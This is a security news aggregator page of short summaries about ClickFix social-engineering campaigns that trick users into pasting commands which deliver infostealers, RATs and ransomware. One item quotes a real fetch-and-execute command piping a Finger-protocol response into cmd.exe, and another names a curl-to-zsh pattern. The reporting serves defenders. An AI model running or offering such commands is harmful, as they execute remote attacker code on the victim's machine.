< ciso
brief />
Tag Banner

All news with #clickfix tag

79 articles · page 3 of 4

Pastebin-Promoted ClickFix JavaScript Attack Hijacks Swaps

🚨 Threat actors are abusing Pastebin comments to promote a ClickFix-style social engineering campaign that tricks cryptocurrency users into executing JavaScript in their browser, enabling attackers to hijack Bitcoin swap transactions on Swapzone.io. Victims are directed to copy a javascript: snippet from a hosted paste and execute it in the address bar; the injected, obfuscated payload overrides the exchange's swap logic and replaces deposit addresses with attacker-controlled wallets. The code also tampers with displayed rates and offers to simulate successful arbitrage. Because the script runs within the victim's authenticated session, the interface looks legitimate while funds are irreversibly redirected to attackers.
read more →

Microsoft Details DNS-Based ClickFix Variant Targeting Users

🔍 Microsoft disclosed a DNS-based evolution of the ClickFix social-engineering tactic that coerces victims into running nslookup via the Windows Run dialog to retrieve a second-stage payload. The initial cmd.exe command queries a hard-coded external DNS server and extracts the Name: response to execute the next stage. The staged payload downloads a ZIP from azwsappdev[.]com, runs a malicious Python script, drops a VBScript that launches ModeloRAT, and establishes persistence via a Startup LNK.
read more →

LummaStealer Spike Linked to CastleLoader and ClickFix

🛡️ Bitdefender has identified a sharp increase in LummaStealer infections driven by social‑engineering campaigns that use the ClickFix clipboard trick to deliver the CastleLoader malware. CastleLoader is a heavily obfuscated, script‑based loader that decrypts and executes payloads in memory while adapting persistence and file paths to evade detection. Researchers note a characteristic failed DNS lookup artifact that can aid detection and recommend avoiding pirated or untrusted software and never running PowerShell commands provided by web pages.
read more →

North Korean Hackers Use Deepfake Meetings to Target Crypto

🛡️ Mandiant attributes a targeted campaign to North Korean financially motivated group UNC1069, which combines social engineering, deepfake video and macOS malware to steal cryptocurrency and credentials. The attackers hijacked a cryptocurrency executive’s Telegram account to build trust, then sent a calendar invite to a faux Zoom meeting hosted on attacker infrastructure. During the call a purported deepfake of the executive appeared and a ClickFix ruse persuaded victims to run commands, enabling deployment of backdoors and information-stealers.
read more →

North Korean actors use ClickFix and macOS backdoors

🔐UNC1069-linked actors used a ClickFix-style social engineering chain to compromise a macOS user at a cryptocurrency/DeFi company. Attackers hijacked a Telegram account, staged a fake Zoom meeting (reportedly using AI-generated video), and instructed the victim to paste curl | zsh commands into Terminal. The resulting infection deployed a multi-stage macOS toolkit—WAVESHAPER, HYPERCALL, HIDDENCALL, DEEPBREATH, and CHROMEPUSH—enabling remote access and data theft. Mandiant provided IOCs and YARA rules to aid detection.
read more →

Microsoft: Python-based infostealers targeting macOS

⚠ Microsoft warns that information-stealing campaigns are expanding beyond Windows to target Apple macOS by leveraging cross-platform languages like Python and abusing trusted distribution platforms. Since late 2025, attackers have used malvertising and Google Ads to redirect users to fake sites that employ ClickFix lures and DMG installers to deploy families such as Atomic macOS Stealer (AMOS), MacSync, and DigitStealer. Campaigns use fileless execution, native macOS utilities, and AppleScript to harvest browser credentials, session cookies, iCloud Keychain items, and developer secrets. Organizations are urged to train users on malvertising and fake installers, monitor Terminal and iCloud Keychain access, and inspect network egress for POSTs to newly registered or suspicious domains.
read more →

ClickFix attacks abuse Windows App-V to deliver Amatera

🔒 A recent campaign blends the ClickFix social-engineering method with a fake CAPTCHA and a signed Microsoft App-V script to deliver the Amatera infostealer. Attackers use the trusted SyncAppvPublishingServer.vbs executed via wscript.exe to proxy PowerShell and evade detection, then fetch configuration from a public Google Calendar. Later stages hide encrypted PowerShell payloads in PNGs via LSB steganography and execute Amatera in memory. Researchers recommend removing unused App-V components, restricting the Run dialog, enabling PowerShell logging, and monitoring outbound connection anomalies.
read more →

Holiday Season Malware Targets Hotels via Booking Lures

⚠️ Securonix researchers have identified a multi-stage malware campaign, tracked as PHALT#BLYX, that targets hospitality organizations during the holiday season. The attack begins with phishing emails impersonating Booking.com, using urgent, high‑value reservation charges to lure victims to a convincing clone site. Victims are coerced through fake CAPTCHA and simulated BSOD prompts to paste a PowerShell command that downloads a project file executed by MSBuild.exe, culminating in a heavily obfuscated DCRat remote access Trojan. Securonix advises staff training, strict handling of browser‑prompted commands and enhanced monitoring of trusted binaries and process behaviour.
read more →

Phishing Campaign Uses Fake Booking Emails to Deploy DCRat

📧 Securonix researchers uncovered PHALT#BLYX, a phishing campaign that uses ClickFix-style lures and counterfeit Booking.com reservation messages to trick hospitality staff into executing commands that pull and run remote code. The landing pages present a fake CAPTCHA then a staged blue screen of death that instructs victims to paste a command into the Windows Run dialog, triggering a PowerShell dropper. That dropper downloads an MSBuild project (v.proj) and invokes MSBuild.exe to configure Defender exclusions, persist in Startup, and retrieve the DCRat remote-access trojan.
read more →

ClickFix Campaign Uses Fake BSOD to Trick Hospitality Staff

🛑 This campaign impersonates Booking.com to redirect hospitality staff to a cloned site that triggers a full-screen fake Windows BSOD. The page instructs victims to paste and run a command that launches PowerShell, compiles a malicious .NET project via MSBuild.exe, and executes a loader. The payload disables Defender exclusions, triggers UAC prompts for elevation, and deploys DCRAT (staxs.exe) which provides remote access and can drop additional tools such as cryptocurrency miners.
read more →

ErrTraffic Automates ClickFix Attacks via Fake Glitches

⚠️ ErrTraffic is a self-hosted cybercrime platform that automates ClickFix social engineering by injecting code into compromised websites to display convincing browser or font 'glitches' and prompt victims to install updates or run commands. The service, promoted on Russian-speaking forums for a one-time $800 fee, fingerprints OS and geolocation to deliver architecture-specific payloads. According to Hudson Rock, infections deploy Windows info-stealers (Lumma, Vidar), Android Cerberus, macOS AMOS, and various Linux backdoors, while the operator has excluded CIS countries.
read more →

ConsentFix: Browser-based evolution of ClickFix phishing

🔒 Researchers at Push Security describe ConsentFix, a browser-only evolution of the ClickFix phishing technique that captures OAuth tokens for Microsoft logins. The attack leverages legitimate but compromised sites and a fake Cloudflare-style CAPTCHA to trick victims into copying and pasting a URL containing an OAuth token, which yields account access via Azure CLI without a password or MFA. Push Security warns the method avoids many endpoint and authentication defenses and is difficult to detect; mitigation requires tightened consent governance, enhanced monitoring, and browser-based protections.
read more →

Google Ads Lead to ChatGPT/Grok Guides Installing AMOS

⚠️ Security researchers warn of a macOS infostealer campaign that uses Google search ads to push users toward publicly shared ChatGPT and Grok conversations containing malicious installation instructions. According to Kaspersky and Huntress, the ClickFix attack spoofs troubleshooting guides and decodes a base64 payload into a bash script that prompts for a password, then uses it to install the AMOS infostealer with root privileges. Users are urged not to execute commands copied from online chats and to verify safety first.
read more →

ClickFix Trick Drives Rise in CastleLoader Python Loaders

🛡️ Blackpoint researchers have uncovered a campaign that leverages ClickFix social engineering to trick users into running a benign-looking command via the Windows Run dialog. That single action launches a hidden conhost.exe process which fetches a small tar archive, unpacks it into AppData and runs a windowless Python interpreter. The bundled interpreter executes compiled Python bytecode that reconstructs and decrypts CastleLoader shellcode in memory, avoiding disk-based artifacts. Observed staging uses a GoogeBot user agent and familiar /service/download/ paths, linking the activity to the CastleLoader family.
read more →

New ClickFix Attacks Use Fake Windows Update Lures

🛡️Huntress warns of an evolved ClickFix campaign that uses a convincing full‑screen Windows Update splash and steganographic PNGs to trick employees into pasting and running commands. Those commands deliver loaders that in turn deploy LummaC2 and Rhadamanthys infostealers. The firm reports a 313% increase in ClickFix incidents over six months and noted multiple active lure domains even after the Nov 13 Operation Endgame takedown. Primary mitigation advice is to disable the Windows Run dialog via Registry or GPO and pair user awareness with endpoint monitoring and EDR.
read more →

ClickFix Uses Fake Windows Update to Deliver Malware

🔒 Researchers warn of ClickFix attack variants that display a realistic full‑screen fake Windows Update animation in the browser to trick users into pasting commands that execute malware. Operators use steganography to hide AES‑encrypted shellcode inside PNG pixel data and leverage mshta, PowerShell, and a .NET Stego Loader to reconstruct and run payloads. Huntress observed delivery of LummaC2 and Rhadamanthys info stealers and a dynamic evasion ctrampoline technique to hinder analysis. A law enforcement takedown in November disrupted payload delivery on some fake update domains.
read more →

Fake CAPTCHA Leads to 42-Day Akira Ransomware Compromise

🔒 An employee clicking a fake CAPTCHA (a ClickFix social-engineering lure) on a compromised car dealership site began a 42-day intrusion by Howling Scorpius that delivered the .NET remote access Trojan SectopRAT and ultimately Akira ransomware. Two enterprise EDRs recorded activity but produced few alerts, enabling lateral movement, privilege escalation and the exfiltration of roughly 1 TB. Unit 42 deployed Cortex XSIAM, rebuilt hardened infrastructure, tightened IAM controls and negotiated about a 68% reduction in the ransom demand.
read more →

EVALUSION ClickFix Campaign Delivers Amatera, NetSupport

🔒 Researchers identified a ClickFix-based EVALUSION campaign deploying Amatera Stealer and NetSupport RAT, observed in November 2025. The campaign abuses the Windows Run dialog and mshta.exe to launch a PowerShell script that downloads a .NET DLL hosted on MediaFire; the Amatera DLL, packed with PureCrypter, is injected into MSBuild.exe to exfiltrate data. eSentire highlights Amatera's WoW64 SysCalls evasion and conditional NetSupport deployment when domain membership or valuable files are detected.
read more →

Decades-Old Finger Protocol Used to Deliver ClickFix Malware

🛡️ Researchers warn the decades-old Finger protocol is being repurposed in ClickFix-style campaigns to fetch remote commands and execute them on Windows systems. Attackers social-engineer victims into running batch commands such as finger root@finger.nateams[.]com | cmd, piping remote output directly into cmd.exe. Observed chains create randomly named folders, copy and rename curl.exe, download a ZIP disguised as a PDF, extract a Python malware package and launch it via pythonw.exe. Blocking outbound TCP port 79 is the primary mitigation to prevent systems from connecting to remote Finger daemons.
read more →

Acronis on FileFix, SideWinder and Shadow Vector Campaigns

🔍 Acronis TRU describes practical VirusTotal hunting techniques used to track the FileFix ClickFix variant, the long-running SideWinder actor, and the Shadow Vector SVG campaign targeting Colombian users. Using Livehunt, content-based YARA rules, VT Diff, and metadata pivoting, analysts located clipboard-based web payloads, document exploits (CVE‑2017‑0199/11882), and judicial-themed SVG decoys. The post emphasizes iterative rule tuning, retrohunt for timelines, and infrastructure pivots that convert fragmented indicators into actionable intelligence.
read more →